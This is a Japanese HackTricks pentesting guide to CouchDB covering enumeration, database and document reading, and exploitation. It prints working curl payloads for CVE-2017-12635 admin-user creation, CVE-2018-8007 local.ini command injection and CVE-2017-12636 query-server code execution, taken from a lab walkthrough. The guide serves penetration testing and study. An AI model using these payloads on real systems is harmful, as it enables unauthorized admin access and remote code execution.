hacktricks/network-services-pentesting/5984-pentesting-couchdb.md

19 KiB
Raw Blame History

5984,6984 - CouchDBのペンテスト

**htARTEHackTricks AWS Red Team Expert** **htARTEHackTricks AWS Red Team Expert**を通じて、ゼロからヒーローまでAWSハッキングを学ぶ

HackTricksをサポートする他の方法

基本情報

CouchDBは、キーと値のマップ構造を使用してデータを整理する柔軟で強力な文書指向データベースです。ドキュメント内のフィールドはキー/値のペア、リスト、またはマップとして表現でき、データの保存と取得に柔軟性を提供します。

CouchDBに格納されるすべてのドキュメントには、ドキュメントレベルで一意の識別子(_id)が割り当てられます。さらに、データベースに行われた各変更はリビジョン番号_rev)が割り当てられます。このリビジョン番号により、変更の効率的な追跡と管理が可能となり、データの簡単な取得とデータベース内での同期が容易になります。

デフォルトポート: 5984http、6984https

PORT      STATE SERVICE REASON
5984/tcp  open  unknown syn-ack

自動列挙

nmap -sV --script couchdb-databases,couchdb-stats -p <PORT> <IP>
msf> use auxiliary/scanner/couchdb/couchdb_enum

マニュアル列挙

バナー

curl http://IP:5984/

これはインストールされたCouchDBインスタンスにGETリクエストを送信します。返信は以下のいずれかのようになるはずです

{"couchdb":"Welcome","version":"0.10.1"}
{"couchdb":"Welcome","version":"2.0.0","vendor":{"name":"The Apache Software Foundation"}}

{% hint style="info" %} CouchDBのルートにアクセスすると、401 Unauthorizedが返され、次のようなメッセージが表示されます: {"error":"unauthorized","reason":"Authentication required."} バナーや他のエンドポイントにアクセスできません。 {% endhint %}

情報列挙

これらは、GETリクエストでアクセスできるエンドポイントであり、いくつかの興味深い情報を抽出できます。CouchDBのドキュメントには、より多くのエンドポイントと詳細な説明が記載されています

  • /_active_tasks 実行中のタスクのリスト。タスクのタイプ、名前、ステータス、プロセスIDを含む。
  • /_all_dbs CouchDBインスタンス内のすべてのデータベースのリストを返します。
  • /_cluster_setup ノードまたはクラスターのステータスを返します。クラスターセットアップウィザードに従います。
  • /_db_updates CouchDBインスタンス内のすべてのデータベースイベントのリストを返します。このエンドポイントを使用するには、_global_changesデータベースの存在が必要です。
  • /_membership cluster_nodesとしてクラスターに属するノードを表示します。all_nodesフィールドには、このノードが知っているすべてのノードが表示され、クラスターに属するノードも含まれます。
  • /_scheduler/jobs レプリケーションジョブのリスト。各ジョブの説明には、ソースとターゲット情報、レプリケーションID、最近のイベントの履歴、その他いくつかの情報が含まれます。
  • /_scheduler/docs レプリケーションドキュメントの状態のリスト。completedおよびfailedの状態を含むすべてのドキュメントに関する情報が含まれます。各ドキュメントには、ドキュメントID、データベース、レプリケーションID、ソースとターゲットなどが返されます。
  • /_scheduler/docs/{replicator_db}
  • /_scheduler/docs/{replicator_db}/{docid}
  • /_node/{node-name} /_node/{node-name}エンドポイントは、リクエストを処理するサーバーのErlangード名を確認するために使用できます。これは、この情報を取得する際に最も役立ちます。
  • /_node/{node-name}/_stats _statsリソースは、実行中のサーバーの統計情報を含むJSONオブジェクトを返します。リテラル文字列_localは、ローカルード名のエイリアスとして機能します。したがって、すべての統計URLにおいて、{node-name}_localに置き換えることができます。
  • /_node/{node-name}/_system _systemリソースは、実行中のサーバーのさまざまなシステムレベルの統計情報を含むJSONオブジェクトを返します。現在のード情報を取得するには、{node-name}として_localを使用できます。
  • /_node/{node-name}/_restart
  • /_up サーバーが稼働しており、リクエストに応答する準備ができていることを確認します。maintenance_modetrueまたはnolbの場合、エンドポイントは404レスポンスを返します。
  • /_uuids CouchDBインスタンスから1つ以上のUUIDUniversally Unique Identifiersを要求します。
  • /_reshard クラスター上のリシャーディングの状態を含む、完了、失敗、実行中、停止、および合計ジョブの数を返します。

ここで説明されているように、より興味深い情報を抽出できます: https://lzone.de/cheat-sheet/CouchDB

データベースリスト

curl -X GET http://IP:5984/_all_dbs

もしリクエストが401 Unauthorizedで応答した場合、データベースにアクセスするためには有効な資格情報が必要です:

curl -X GET http://user:password@IP:5984/_all_dbs

有効な資格情報を見つけるためには、サービスをブルートフォースすることができます。

これは、データベースをリストする権限が十分にある場合のcouchdbのレスポンスの例です(ただし、データベースのリストのみです):

["_global_changes","_metadata","_replicator","_users","passwords","simpsons"]

データベース情報

データベース名にアクセスすることで、データベースの情報(ファイル数やサイズなど)を取得できます:

curl http://IP:5984/<database>
curl http://localhost:5984/simpsons
#Example response:
{"db_name":"simpsons","update_seq":"7-g1AAAAFTeJzLYWBg4MhgTmEQTM4vTc5ISXLIyU9OzMnILy7JAUoxJTIkyf___z8rkQmPoiQFIJlkD1bHjE-dA0hdPFgdAz51CSB19WB1jHjU5bEASYYGIAVUOp8YtQsgavfjtx-i9gBE7X1i1D6AqAX5KwsA2vVvNQ","sizes":{"file":62767,"external":1320,"active":2466},"purge_seq":0,"other":{"data_size":1320},"doc_del_count":0,"doc_count":7,"disk_size":62767,"disk_format_version":6,"data_size":2466,"compact_running":false,"instance_start_time":"0"}

ドキュメントリスト

データベース内の各エントリをリストします。

curl -X GET http://IP:5984/{dbname}/_all_docs
curl http://localhost:5984/simpsons/_all_docs
#Example response:
{"total_rows":7,"offset":0,"rows":[
{"id":"f0042ac3dc4951b51f056467a1000dd9","key":"f0042ac3dc4951b51f056467a1000dd9","value":{"rev":"1-fbdd816a5b0db0f30cf1fc38e1a37329"}},
{"id":"f53679a526a868d44172c83a61000d86","key":"f53679a526a868d44172c83a61000d86","value":{"rev":"1-7b8ec9e1c3e29b2a826e3d14ea122f6e"}},
{"id":"f53679a526a868d44172c83a6100183d","key":"f53679a526a868d44172c83a6100183d","value":{"rev":"1-e522ebc6aca87013a89dd4b37b762bd3"}},
{"id":"f53679a526a868d44172c83a61002980","key":"f53679a526a868d44172c83a61002980","value":{"rev":"1-3bec18e3b8b2c41797ea9d61a01c7cdc"}},
{"id":"f53679a526a868d44172c83a61003068","key":"f53679a526a868d44172c83a61003068","value":{"rev":"1-3d2f7da6bd52442e4598f25cc2e84540"}},
{"id":"f53679a526a868d44172c83a61003a2a","key":"f53679a526a868d44172c83a61003a2a","value":{"rev":"1-4446bfc0826ed3d81c9115e450844fb4"}},
{"id":"f53679a526a868d44172c83a6100451b","key":"f53679a526a868d44172c83a6100451b","value":{"rev":"1-3f6141f3aba11da1d65ff0c13fe6fd39"}}
]}

ドキュメントの読み取り

データベース内のドキュメントの内容を読み取ります:

curl -X GET http://IP:5984/{dbname}/{id}
curl http://localhost:5984/simpsons/f0042ac3dc4951b51f056467a1000dd9
#Example response:
{"_id":"f0042ac3dc4951b51f056467a1000dd9","_rev":"1-fbdd816a5b0db0f30cf1fc38e1a37329","character":"Homer","quote":"Doh!"}

CouchDB特権昇格 CVE-2017-12635

ErlangとJavaScriptのJSONパーサーの違いのおかげで、次のリクエストで資格情報hacktricks:hacktricksを持つ管理者ユーザーを作成することができます:

curl -X PUT -d '{"type":"user","name":"hacktricks","roles":["_admin"],"roles":[],"password":"hacktricks"}' localhost:5984/_users/org.couchdb.user:hacktricks -H "Content-Type:application/json"

この脆弱性に関する詳細情報はこちら.

CouchDB RCE

Erlang Cookieセキュリティ概要

例はこちらから。

CouchDBのドキュメントでは、特にクラスター設定に関するセクションリンクで、クラスターモードでのCouchDBのポートの使用が説明されています。スタンドアロンモードと同様に、ポート5984が使用されることが述べられています。さらに、ポート5986ードローカルAPI用であり、重要なのは、ErlangがErlangクラスター内でード間通信を可能にするためにErlang Port Mapper DaemonEPMDにTCPポート4369を必要とすることです。この設定により、各ノードが他のすべてのノードと相互にリンクされたネットワークが形成されます。

ポート4369に関する重要なセキュリティアドバイスが強調されています。このポートがインターネット上または信頼されていないネットワーク経由でアクセス可能になっている場合、システムのセキュリティは一意の識別子である「cookie」に大きく依存します。このcookieはセーフガードとして機能します。たとえば、特定のプロセスリストで、システムのセキュリティフレームワーク内での操作的な役割を示すcookieとして「monster」という名前のcookieが観察されるかもしれません。

www-data@canape:/$ ps aux | grep couchdb
root        744  0.0  0.0   4240   640 ?        Ss   Sep13   0:00 runsv couchdb
root        811  0.0  0.0   4384   800 ?        S    Sep13   0:00 svlogd -tt /var/log/couchdb
homer       815  0.4  3.4 649348 34524 ?        Sl   Sep13   5:33 /home/homer/bin/../erts-7.3/bin/beam -K true -A 16 -Bd -- -root /home/homer/b

Erlangシステムのコンテキストでこの「cookie」がどのように悪用され、リモートコード実行RCEにつながるかを理解したい方には、詳細なガイドが用意されています。これはErlangのcookieを不正な方法で利用してシステムを制御するための方法について詳しく説明しています。Erlang cookieをRCEに悪用する詳細ガイドをこちらでご覧いただけます

CVE-2018-8007の悪用local.iniの変更を通じて

例はこちらから。

最近公開された脆弱性であるCVE-2018-8007は、Apache CouchDBに影響を与え、悪用にはlocal.iniファイルへの書き込み権限が必要であることが明らかになりました。初期のターゲットシステムにはセキュリティ制限があるため、直接適用することはできませんが、探索目的でlocal.iniファイルへの書き込みアクセス権限を付与するための変更が行われました。以下に、プロセスを示す詳細な手順とコード例が提供されています。

まず、環境を準備するために、local.iniファイルが書き込み可能であることを確認し、権限をリストアップして検証します:

root@canape:/home/homer/etc# ls -l
-r--r--r-- 1 homer homer 18477 Jan 20  2018 default.ini
-rw-rw-rw- 1 homer homer  4841 Sep 14 17:39 local.ini
-r--r--r-- 1 root  root   4841 Sep 14 14:30 local.ini.bk
-r--r--r-- 1 homer homer  1345 Jan 14  2018 vm.args

以下の脆弱性を悪用するために、local.ini内のcors/origins構成をターゲットにしたcurlコマンドが実行されます。これにより、新しいオリジンが挿入され、[os_daemons]セクションに追加のコマンドが挿入され、任意のコードが実行されることを目指します:

www-data@canape:/dev/shm$ curl -X PUT 'http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/cors/origins' -H "Accept: application/json" -H "Content-Type: application/json" -d "0xdf\n\n[os_daemons]\ntestdaemon = /usr/bin/touch /tmp/0xdf"

次の検証では、変更点を強調するために、local.ini に注入された設定をバックアップと対比して示しています:

root@canape:/home/homer/etc# diff local.ini local.ini.bk
119,124d118
< [cors]
< origins = 0xdf
< [os_daemons]
< test_daemon = /usr/bin/touch /tmp/0xdf

最初、予想されるファイル(/tmp/0xdf)は存在せず、注入されたコマンドがまだ実行されていないことを示しています。さらなる調査により、CouchDBに関連するプロセスが実行されており、注入されたコマンドを実行する可能性がある1つのプロセスがあることが明らかになりました:

root@canape:/home/homer/bin# ps aux | grep couch

以下の手順で、特定されたCouchDBプロセスを終了させ、システムが自動的に再起動することで、注入されたコマンドの実行がトリガーされ、以前に欠落していたファイルの存在が確認されます

root@canape:/home/homer/etc# kill 711
root@canape:/home/homer/etc# ls /tmp/0xdf
/tmp/0xdf

この調査は、特定の条件下でCVE-2018-8007の悪用の実行可能性を確認しました。特に、local.iniファイルへの書き込みアクセスが必要です。提供されたコード例と手順には、制御された環境で脆弱性を再現するための明確なガイドが含まれています。

CVE-2018-8007の詳細については、mdsecによるアドバイザリを参照してくださいCVE-2018-8007

Write Permissions on local.iniでCVE-2017-12636を探る

例はこちらから。

CVE-2017-12636として知られる脆弱性が探索され、CouchDBプロセスを介したコード実行が可能となりますが、特定の構成によってはその悪用が防止される場合があります。オンラインで利用可能な多数のProof of ConceptPOCリファレンスがあるにもかかわらず、一般的に標的とされるバージョン1.xと異なるCouchDBバージョン2で脆弱性を悪用するためには調整が必要です。最初のステップは、CouchDBバージョンの確認と、期待されるクエリサーバーパスの不在を確認することです。

curl http://localhost:5984
curl http://0xdf:df@localhost:5984/_config/query_servers/

CouchDBバージョン2.0に対応するために、新しいパスが利用されています:

curl 'http://0xdf:df@localhost:5984/_membership'
curl http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/query_servers

次の出力によると、新しいクエリサーバーを追加して呼び出そうとする試みは、許可関連のエラーに遭遇しました:

curl -X PUT 'http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/query_servers/cmd' -d '"/sbin/ifconfig > /tmp/df"'

さらなる調査により、local.iniファイルに書き込み権限がないことが判明しました。rootまたはhomerアクセス権でファイルの権限を変更することで、進行が可能になりました

cp /home/homer/etc/local.ini /home/homer/etc/local.ini.b
chmod 666 /home/homer/etc/local.ini

次のクエリサーバーの追加試行は成功し、応答にエラーメッセージがないことで示されました。local.ini ファイルの変更が成功したことは、ファイルの比較によって確認されました:

curl -X PUT 'http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/query_servers/cmd' -d '"/sbin/ifconfig > /tmp/df"'

作業は、データベースとドキュメントの作成を行った後、新しく追加されたクエリサーバーにマッピングされたカスタムビューを介してコードを実行しようとする試みに続きました:

curl -X PUT 'http://0xdf:df@localhost:5984/df'
curl -X PUT 'http://0xdf:df@localhost:5984/df/zero' -d '{"_id": "HTP"}'
curl -X PUT 'http://0xdf:df@localhost:5984/df/_design/zero' -d '{"_id": "_design/zero", "views": {"anything": {"map": ""} }, "language": "cmd"}'

Shodan

  • port:5984 couchdb

参考文献